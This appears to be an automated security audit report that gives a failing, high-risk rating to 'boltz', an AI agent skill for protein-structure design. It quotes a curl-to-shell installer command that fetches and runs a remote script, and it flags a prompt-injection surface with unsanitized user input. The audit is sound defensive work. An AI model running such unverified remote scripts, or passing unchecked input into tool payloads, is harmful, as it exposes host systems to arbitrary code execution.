boltz
Fail
Audited by Gen Agent Trust Hub on Jun 23, 2026
Risk Level: HIGHEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The SKILL.md file provides an installation command
curl -fsSL https://install.boltz.bio/boltz-api/install.sh | shthat downloads a shell script from a remote server and executes it immediately with shell privileges. This pattern allows for unverified arbitrary code execution on the host system. - [EXTERNAL_DOWNLOADS]: The skill downloads the
boltz-apiCLI installer fromhttps://install.boltz.bio, which is an external source not included in the primary trusted registries. - [COMMAND_EXECUTION]: The skill facilitates the execution of the
boltz-apiCLI and a bundled shell scriptscripts/persist.sh. These tools are executed with arguments such as run names and file paths derived from user-provided inputs, which can be exploited if the inputs are not properly validated. - [PROMPT_INJECTION]: The skill exhibits an indirect prompt injection surface by processing untrusted user data to generate YAML payloads for the Boltz API CLI. Ingestion points: User prompts for designing protein or small-molecule structures (documented in references/examples.md). Boundary markers: Absent from the instructions and prompt templates. Capability inventory: The
boltz-apiCLI tool (which performs network operations and file system writes) and thescripts/persist.shscript (which performs file system operations). Sanitization: There is no evidence of sanitization or validation of user-provided content before it is interpolated into the payloads used by the CLI tool.
Recommendations
- HIGH: Downloads and executes remote code from: https://install.boltz.bio/boltz-api/install.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata